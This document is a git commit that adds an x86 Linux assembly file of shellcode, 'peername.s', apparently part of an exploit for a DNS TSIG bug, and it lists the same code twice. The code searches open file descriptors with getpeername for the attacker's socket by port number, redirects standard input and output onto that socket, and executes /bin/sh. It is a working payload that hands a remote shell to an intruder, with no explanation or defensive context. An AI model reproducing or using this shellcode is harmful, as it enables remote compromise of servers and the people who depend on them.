initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/tsig/shellcode/peername.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 79 insertions, 0 deletions
diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s
new file mode 100644
index 0000000..61cab0a
--- /dev/null
+++ b/other/tsig/shellcode/peername.s
@@ -0,0 +1,79 @@
+.globl  cbegin
+.globl  cend
+cbegin:
+        xor    %ebx,%ebx
+        mov    $0x7,%bl
+        mov    %esp,%edx
+        jmp    label1
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+label1:
+        push   $0x10
+        mov    %esp,%ecx
+        push   %ecx
+        push   %edx
+        push   $0xfe
+        mov    %esp,%ecx
+label2:
+        xor    %eax,%eax
+        mov    $0x66,%al
+        int    $0x80
+        test   $0xff,%al
+        jne    label3
+        cmpw   $0x5234,0x12(%esp,1)
+        je     label4
+label3:
+        pop    %edx
+        test   $0xff,%dl
+        je     label7
+        dec    %dl
+        push   %edx
+        jmp    label2
+.ascii "\x38"
+label4:
+        pop    %ebx
+        xor    %ecx,%ecx
+        mov    $0x3,%cl
+label5:
+        dec    %cl
+        xor    %eax,%eax
+        mov    $0x3f,%al
+        int    $0x80
+        jcxz   label6
+        jmp    label5
+label6:
+        push   $0x4
+        push   $0x0
+        push   $18
+        push   $1
+        push   %ebx
+        movl   $102, %eax
+        movl   $14, %ebx
+        movl   %esp, %ecx
+        int $0x80
+        push   $0x0
+        push   $0x0
+        push   $0x68732f
+        push   $0x6e69622f
+        lea    0x8(%esp,1),%ecx
+        lea    0xc(%esp,1),%edx
+        mov    %esp,(%ecx)
+        mov    %esp,%ebx
+        xor    %eax,%eax
+        mov    $0xb,%al
+        int    $0x80
+label7:
+        xor    %eax,%eax
+        inc    %al
+        int    $0x80
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/tsig/shellcode/peername.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s new file mode 100644 index 0000000..61cab0a --- /dev/null +++ b/other/tsig/shellcode/peername.s
@@ -0,0 +1,79 @@
	1	.globl cbegin
	2	.globl cend
	3
	4	cbegin:
	5	xor %ebx,%ebx
	6	mov $0x7,%bl
	7	mov %esp,%edx
	8	jmp label1
	9	stos %al,%es:(%edi)
	10	stos %al,%es:(%edi)
	11	stos %al,%es:(%edi)
	12	stos %al,%es:(%edi)
	13	stos %al,%es:(%edi)
	14	stos %al,%es:(%edi)
	15	stos %al,%es:(%edi)
	16	stos %al,%es:(%edi)
	17	stos %al,%es:(%edi)
	18
	19	label1:
	20	push $0x10
	21	mov %esp,%ecx
	22	push %ecx
	23	push %edx
	24	push $0xfe
	25	mov %esp,%ecx
	26	label2:
	27	xor %eax,%eax
	28	mov $0x66,%al
	29	int $0x80
	30	test $0xff,%al
	31	jne label3
	32	cmpw $0x5234,0x12(%esp,1)
	33	je label4
	34	label3:
	35	pop %edx
	36	test $0xff,%dl
	37	je label7
	38	dec %dl
	39	push %edx
	40	jmp label2
	41	.ascii "\x38"
	42	label4:
	43	pop %ebx
	44	xor %ecx,%ecx
	45	mov $0x3,%cl
	46	label5:
	47	dec %cl
	48	xor %eax,%eax
	49	mov $0x3f,%al
	50	int $0x80
	51	jcxz label6
	52	jmp label5
	53	label6:
	54	push $0x4
	55	push $0x0
	56	push $18
	57	push $1
	58	push %ebx
	59	movl $102, %eax
	60	movl $14, %ebx
	61	movl %esp, %ecx
	62	int $0x80
	63	push $0x0
	64	push $0x0
	65	push $0x68732f
	66	push $0x6e69622f
	67	lea 0x8(%esp,1),%ecx
	68	lea 0xc(%esp,1),%edx
	69	mov %esp,(%ecx)
	70	mov %esp,%ebx
	71	xor %eax,%eax
	72	mov $0xb,%al
	73	int $0x80
	74	label7:
	75	xor %eax,%eax
	76	inc %al
	77	int $0x80
	78	cend:
	79